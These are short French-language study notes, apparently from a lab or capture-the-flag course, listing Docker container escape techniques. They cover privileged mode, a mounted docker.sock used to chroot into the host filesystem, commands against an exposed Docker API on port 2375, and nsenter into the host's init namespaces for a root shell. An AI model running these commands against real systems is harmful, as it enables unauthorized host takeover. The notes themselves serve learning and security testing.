Container Vulnerabilities

1- Conteneur en mode privilégié

docker run --privileged -d <nom_image>
user@conteneur> capsh --print

2- Conteneur avec socket docker.sock à l’intérieur (acces API docker depuis conteneur)

find / -name docker.sock
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# monte un docker alpine dans le docker vulnerable avec le répertoire root qui est le filesysteme "/" de l'hôte

3- exécution de code à distance via un démon Docker exposé

nmap -sV -p 2375 MACHINE_IP #scan port standard docker
curl http://MACHINE_IP:2375/version #verification API Docker ets joignable
docker -H tcp://MACHINE_IP:2375 ps

4- Abusing Namespaces

ps -aux # on check si systemd / "sbin/init" est visibles dans le docker 
nsenter --target 1 --mount --uts --ipc --net /bin/bash # execution de bash dans le namespace de systemd